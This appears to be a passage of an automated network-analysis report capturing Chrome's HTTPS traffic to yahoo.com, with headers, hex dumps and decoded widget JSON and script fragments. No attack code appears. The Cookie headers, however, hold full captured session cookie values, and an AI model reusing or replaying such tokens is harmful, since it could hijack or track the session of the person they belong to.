                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC297OUTData Raw: 7b 22 63 6f 6e 66 69 67 22 3a 7b 22 63 70 6f 73 22 3a 35 2c 22 6d 6f 64 75 6c 65 54 69 74 6c 65 22 3a 22 42 75 79 69 6e 67 20 61 64 76 69 63 65 22 2c 22 73 6c 6f 74 74 65 64 49 6e 53 74 72 65 61 6d 22 3a 31 2c 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 2c 22 65 6e 61 62 6c 65 52 43 56 22 3a 74 72 75 65 2c 22 73 68 6f 70 70 69 6e 67 43 61 72 6f 75 73 65 6c 22 3a 66 61 6c 73 65 2c 22 73 68 6f 70 70 69 6e 67 43 61 72 6f 75 73 65 6c 56 32 22 3a 66 61 6c 73 65 2c 22 73 68 6f 70 70 69 6e 67 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 79 61 68 6f 6f 2e 63 6f 6d 2f 74 6f 70 69 63 73 2f 70 72 69 6d 65 2d 64 61 79 2f 22 7d 2c 22 63 74 72 6c 22 3a 22 53 68 6f 70 70 69 6e 67 22 2c 22 6d 5f 69
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"config":{"cpos":5,"moduleTitle":"Buying advice","slottedInStream":1,"xhrPathPrefix":"/fp_ms/_rcv/remote","enableRCV":true,"shoppingCarousel":false,"shoppingCarouselV2":false,"shoppingUrl":"https://www.yahoo.com/topics/prime-day/"},"ctrl":"Shopping","m_i
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC708INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-app-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-id: react-wafer-shopping
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 6
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC5INData Raw: 35 66 64 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 5fd
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 7b 22 61 73 73 65 74 73 22 3a 7b 22 63 73 73 22 3a 5b 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 63 70 72 6f 70 73 2f 63 6f 6c 6f 72 73 5f 31 2e 31 2e 32 37 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22 3a 22 63 75 73 74 6f 6d 2d 70 72 6f 70 65 72 74 69 65 73 22 2c 22 76 65 72 73 69 6f 6e 22 3a 22 31 2e 31 2e 32 37 22 7d 2c 7b 22 6c 6f 63 61 74 69 6f 6e 22 3a 22 74 6f 70 22 2c 22 76 61 6c 75 65 22 3a 22 2f 61 61 71 2f 66 70 2f 63 73 73 2f 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 2e 53 68 6f 70 70 69 6e 67 2e 61 74 6f 6d 69 63 2e 6c 74 72 2e 64 31 35 36 62 35 34 31 63 30 32 38 66 65 37 64 33 31 36 37 62 31 30 31 64 31 35 35 30 30 66 36 2e 6d 69 6e 2e 63 73 73 22 2c 22 6e 61 6d 65 22
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"assets":{"css":[{"location":"top","value":"/aaq/cprops/colors_1.1.27.min.css","name":"custom-properties","version":"1.1.27"},{"location":"top","value":"/aaq/fp/css/react-wafer-shopping.Shopping.atomic.ltr.d156b541c028fe7d3167b101d15500f6.min.css","name"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC233INData Raw: 6f 74 3b 7d 5c 22 20 64 61 74 61 2d 77 66 2d 74 72 69 67 67 65 72 3d 5c 22 6f 6e 4c 6f 61 64 5c 22 20 64 61 74 61 2d 77 66 2d 74 61 72 67 65 74 3d 5c 22 23 63 6f 6d 6d 65 72 63 65 2d 6d 6f 64 75 6c 65 2d 63 6f 6e 74 61 69 6e 65 72 5c 22 20 64 61 74 61 2d 77 66 2d 75 72 6c 3d 5c 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 3f 63 74 72 6c 3d 53 68 6f 70 70 69 6e 67 43 6f 6e 74 65 6e 74 26 61 6d 70 3b 6d 5f 69 64 3d 72 65 61 63 74 2d 77 61 66 65 72 2d 73 68 6f 70 70 69 6e 67 26 61 6d 70 3b 6d 5f 6d 6f 64 65 3d 6a 73 6f 6e 26 61 6d 70 3b 78 68 72 50 61 74 68 50 72 65 66 69 78 3d 25 32 46 66 70 5f 6d 73 25 32 46 5f 72 63 76 25 32 46 72 65 6d 6f 74 65 5c 22 3e 3c 2f 64 69 76 3e 22 7d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ot;}\" data-wf-trigger=\"onLoad\" data-wf-target=\"#commerce-module-container\" data-wf-url=\"/fp_ms/_rcv/remote?ctrl=ShoppingContent&amp;m_id=react-wafer-shopping&amp;m_mode=json&amp;xhrPathPrefix=%2Ffp_ms%2F_rcv%2Fremote\"></div>"}
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC5INData Raw: 0d 0a 30 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii:


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    129192.168.2.44989187.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC547OUTGET /aaq/wf/wf-clipboard-copy-1.0.2-modern.js HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: s.yimg.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC719INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-id-2: bzCBQKGfL9Xg/UsGh32TYvWoaKqm6HFmoy3Ntolzjm02oHp7X00I03irT3Dh+Y49isPPffFoqvw=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-request-id: 9TA0ADWZ2XF2P0JM
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Date: Mon, 30 Sep 2024 12:29:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Last-Modified: Mon, 24 May 2021 16:40:35 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ETag: "9d2a8efbe3fe9705e54df41100ea2dae"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-server-side-encryption: AES256
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cache-Control: public,max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-amz-version-id: s6ZljWUzqa9Ss0D5hEgjXb_jGlec.wYG
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Type: application/javascript
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 4365
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referrer-Policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 17489
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    ATS-Carp-Promotion: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 74 28 29 3a 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 64 65 66 69 6e 65 26 26 64 65 66 69 6e 65 2e 61 6d 64 3f 64 65 66 69 6e 65 28 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 2c 5b 5d 2c 74 29 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 78 70 6f 72 74 73 3f 65 78 70 6f 72 74 73 5b 22 77 61 66 65 72 2d 63 6c 69 70 62 6f 61 72 64 2d 63 6f 70 79 22 5d 3d 74 28 29 3a 28 65 2e 77 61 66 65 72 3d 65 2e 77 61 66 65 72 7c 7c 7b 7d 2c 65 2e 77 61 66 65 72 2e 77 61 66 65 72 73 3d
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: !function(e,t){"object"==typeof exports&&"object"==typeof module?module.exports=t():"function"==typeof define&&define.amd?define("wafer-clipboard-copy",[],t):"object"==typeof exports?exports["wafer-clipboard-copy"]=t():(e.wafer=e.wafer||{},e.wafer.wafers=
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 74 69 6f 6e 2c 20 6e 6f 74 20 22 2b 74 79 70 65 6f 66 20 74 29 3b 65 2e 70 72 6f 74 6f 74 79 70 65 3d 4f 62 6a 65 63 74 2e 63 72 65 61 74 65 28 74 26 26 74 2e 70 72 6f 74 6f 74 79 70 65 2c 7b 63 6f 6e 73 74 72 75 63 74 6f 72 3a 7b 76 61 6c 75 65 3a 65 2c 65 6e 75 6d 65 72 61 62 6c 65 3a 21 31 2c 77 72 69 74 61 62 6c 65 3a 21 30 2c 63 6f 6e 66 69 67 75 72 61 62 6c 65 3a 21 30 7d 7d 29 2c 74 26 26 28 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 3f 4f 62 6a 65 63 74 2e 73 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 65 2c 74 29 3a 65 2e 5f 5f 70 72 6f 74 6f 5f 5f 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 63 28 65 2c 74 29 7b 69 66 28 21 28 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 74 29 29 74 68 72 6f 77 20 6e 65 77 20 54 79 70 65 45 72 72 6f 72 28
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: tion, not "+typeof t);e.prototype=Object.create(t&&t.prototype,{constructor:{value:e,enumerable:!1,writable:!0,configurable:!0}}),t&&(Object.setPrototypeOf?Object.setPrototypeOf(e,t):e.__proto__=t)}function c(e,t){if(!(e instanceof t))throw new TypeError(
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1300INData Raw: 63 6f 70 79 2d 74 65 78 74 22 5d 2c 68 3d 5b 22 68 61 6e 64 6c 65 43 6f 70 79 22 5d 2c 77 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 75 6e 63 74 69 6f 6e 20 74 28 65 29 7b 76 61 72 20 6f 3d 61 72 67 75 6d 65 6e 74 73 2e 6c 65 6e 67 74 68 3e 31 26 26 76 6f 69 64 20 30 21 3d 3d 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3f 61 72 67 75 6d 65 6e 74 73 5b 31 5d 3a 7b 7d 2c 61 3d 6f 2e 73 65 6c 65 63 74 6f 72 3b 72 28 74 68 69 73 2c 74 29 3b 76 61 72 20 63 3d 6e 28 74 68 69 73 2c 28 74 2e 5f 5f 70 72 6f 74 6f 5f 5f 7c 7c 4f 62 6a 65 63 74 2e 67 65 74 50 72 6f 74 6f 74 79 70 65 4f 66 28 74 29 29 2e 63 61 6c 6c 28 74 68 69 73 2c 65 2c 7b 73 65 6c 65 63 74 6f 72 3a 61 7d 2c 7b 53 54 41 54 45 5f 41 54 54 52 53 3a 62 7d 29 29 2c 69 3d 65 2e 67 65 74 41 74 74 72 69 62 75 74
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: copy-text"],h=["handleCopy"],w=function(e){function t(e){var o=arguments.length>1&&void 0!==arguments[1]?arguments[1]:{},a=o.selector;r(this,t);var c=n(this,(t.__proto__||Object.getPrototypeOf(t)).call(this,e,{selector:a},{STATE_ATTRS:b})),i=e.getAttribut
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC465INData Raw: 65 61 3b 74 7c 7c 28 74 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 74 65 78 74 61 72 65 61 22 29 2c 4f 62 6a 65 63 74 2e 61 73 73 69 67 6e 28 74 2e 73 74 79 6c 65 2c 7b 62 6f 72 64 65 72 3a 22 6e 6f 6e 65 22 2c 62 6f 78 53 68 61 64 6f 77 3a 22 6e 6f 6e 65 22 2c 64 69 73 70 6c 61 79 3a 22 6e 6f 6e 65 22 2c 68 65 69 67 68 74 3a 22 32 65 6d 22 2c 6c 65 66 74 3a 30 2c 6f 75 74 6c 69 6e 65 3a 22 6e 6f 6e 65 22 2c 70 61 64 64 69 6e 67 3a 30 2c 70 6f 73 69 74 69 6f 6e 3a 22 66 69 78 65 64 22 2c 74 6f 70 3a 30 2c 77 69 64 74 68 3a 22 32 65 6d 22 7d 29 2c 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 74 29 29 2c 74 2e 73 74 79 6c 65 2e 64 69 73 70 6c 61 79 3d 22 62 6c 6f 63 6b 22 2c 74 2e 76 61 6c 75
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: ea;t||(t=document.createElement("textarea"),Object.assign(t.style,{border:"none",boxShadow:"none",display:"none",height:"2em",left:0,outline:"none",padding:0,position:"fixed",top:0,width:"2em"}),document.body.appendChild(t)),t.style.display="block",t.valu


                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    130192.168.2.44989287.248.119.2524434464C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC1142OUTPOST /fp_ms/_rcv/remote?ctrl=WeatherPreviewRefresh&lang=en-US&m_id=react-wafer-weather&m_mode=json&region=US&rid=1pa4ckpjflnfm&site=fp&apptype=default&instance_id=weather&_evtSrc=deferLoad HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Host: www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Content-Length: 375
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-webp: 1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Origin: https://www.yahoo.com
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-origin
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Referer: https://www.yahoo.com/
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Cookie: A1=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A3=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; A1S=d=AQABBPbd-mYCEBd4O9-WWosr-Ml5_gckZbIFEgEBAQEv_GYEZ9xH0iMA_eMAAA&S=AQAAAtFHlIsUsTVNy2XXUR1j0uw; cmp=t=1727716858&j=0&u=1YNN; gpp=DBAA; gpp_sid=-1
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC375OUTData Raw: 7b 22 62 75 63 6b 65 74 22 3a 22 39 30 30 2c 73 65 61 6d 6c 65 73 73 22 2c 22 63 6f 6e 66 69 67 22 3a 7b 22 66 65 74 63 68 55 73 65 72 46 61 76 4c 6f 63 61 74 69 6f 6e 22 3a 66 61 6c 73 65 2c 22 66 65 74 63 68 55 73 69 6e 67 4e 65 77 47 72 61 76 69 74 6f 6e 42 61 63 6b 65 6e 64 22 3a 66 61 6c 73 65 2c 22 67 72 69 64 4c 61 79 6f 75 74 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 68 65 61 64 65 72 22 3a 74 72 75 65 2c 22 70 75 72 70 6c 65 42 6c 6f 63 6b 48 65 61 64 65 72 45 6e 61 62 6c 65 64 22 3a 74 72 75 65 2c 22 75 6e 69 74 22 3a 22 46 22 2c 22 78 68 72 50 61 74 68 50 72 65 66 69 78 22 3a 22 2f 66 70 5f 6d 73 2f 5f 72 63 76 2f 72 65 6d 6f 74 65 22 7d 2c 22 63 74 72 6c 22 3a 22 57 65 61 74 68 65 72 50 72 65 76 69 65 77 52 65 66 72 65 73 68 22 2c 22 69 6e
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: {"bucket":"900,seamless","config":{"fetchUserFavLocation":false,"fetchUsingNewGravitonBackend":false,"gridLayoutEnabled":true,"header":true,"purpleBlockHeaderEnabled":true,"unit":"F","xhrPathPrefix":"/fp_ms/_rcv/remote"},"ctrl":"WeatherPreviewRefresh","in
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC732INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    expect-ct: max-age=31536000, report-uri="http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    referrer-policy: no-referrer-when-downgrade
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    strict-transport-security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    content-type: application/json; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    status-code: 200
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-app-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-version: 1.0.37293
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-instance-id: weather
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-applet-id: react-wafer-weather
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    date: Mon, 30 Sep 2024 17:21:03 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-upstream-service-time: 44
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    server: ATS
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    x-envoy-decorator-operation: tdv2-app-fp--mtls-production-ir2.frontpage-k8s-frontend.svc.yahoo.local:4080/*
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Age: 0
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC762INData Raw: 43 6f 6e 74 65 6e 74 2d 53 65 63 75 72 69 74 79 2d 50 6f 6c 69 63 79 3a 20 66 72 61 6d 65 2d 61 6e 63 65 73 74 6f 72 73 20 27 73 65 6c 66 27 20 68 74 74 70 73 3a 2f 2f 2a 2e 62 75 69 6c 74 62 79 67 69 72 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 72 69 76 61 6c 73 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 65 6e 67 61 64 67 65 74 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 69 6e 74 68 65 6b 6e 6f 77 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 75 74 6f 62 6c 6f 67 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 74 65 63 68 63 72 75 6e 63 68 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 79 61 68 6f 6f 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 61 6f 6c 2e 63 6f 6d 20 68 74 74 70 73 3a 2f 2f 2a 2e 68 75 66 66 69 6e 67 74 6f 6e 70 6f 73 74 2e 63
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    Data Ascii: Content-Security-Policy: frame-ancestors 'self' https://*.builtbygirls.com https://*.rivals.com https://*.engadget.com https://*.intheknow.com https://*.autoblog.com https://*.techcrunch.com https://*.yahoo.com https://*.aol.com https://*.huffingtonpost.c
                                                                                                                                                                                                                                                                                                                                                                                                                                                                    2024-09-30 17:21:03 UTC6INData Raw: 32 66 65 39 0d 0a
